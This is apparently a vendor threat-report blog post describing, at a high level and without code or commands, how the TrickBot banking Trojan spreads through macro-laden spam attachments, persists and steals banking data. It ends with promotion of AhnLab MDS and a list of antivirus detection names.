TrickBot, a Reincarnation of “The” Dyre

A new malware bot TrickBot seemed like Dyre was brought back to life. TrickBot had a lot in common with the infamous Dyre banking Trojan.

In 2014, Dyre malware caused havoc in the banking systems all over the world for stealing online banking information via spammed emails tailored to look like a legitimate bank notification. Just like Dyre, TrickBot used the same method of operation: spammed emails.

TrickBot targets banking information via emails with malicious attachments. If a user opens the .doc attachment, an image appears as shown in Figure 1, which is disguised as the login page of a well-known bank.

[Figure 1] TrickBot malware disguised as a bank login page

However, the attachment contains macros that downloads TrickBot from the C&C server using PowerShell when activated.

TrickBot was first discovered in October 2016, designed to steal financial information from infected systems and has been steadily distributed via spammed emails and vulnerable websites. The name comes from the mutex name within the code, which was Global\\TrickBot. However, the recently discovered TrickBot has a different mutex name, VLock.

TrickBot operates by copying itself to a specific path within an infected system and adding itself as a task in the Windows Task Scheduler to automatically re-execute the process. There is an encrypted malware within the resources of TrickBot code which loads onto the computer’s memory and executes when TrickBot is operated. The malware loaded in the memory collects information about the infected system, such as the computer name and operating system type, and generates an ID that serves as the unique identifier of the infected system.

TrickBot then generates a specific URL string based on the unique identifier and attempts to access the C&C server. TrickBot will use the information it collected from a system and inject itself to a website browser and online banking information.

AhnLab’s major solutions provide proactive measures against malware that are distributed via spam emails, such as TrickBot. AhnLab’s Advanced Persistent Threat (APT) protection solution, AhnLab MDS, counters such malware attacks by employing Mail Transfer Agent (MTA) mode. In this mode, AhnLab MDS detects, analyzes, and quarantines potentially malicious emails, thereby responding effectively not only to advanced spear-phishing email attacks, but also to email-based ransomware.

To learn more about AhnLab MDS, please visit ahnlab.com. 

The relevant aliases identified by AhnLab’s security solutions are as below:

<Aliases identified by AhnLab V3>

W97M/Downloader 

Trojan/Win32.Trickbot 

Trojan/Win32.ZBot 

<Alias identified by AhnLab MDS>

Malware/MDP.Execute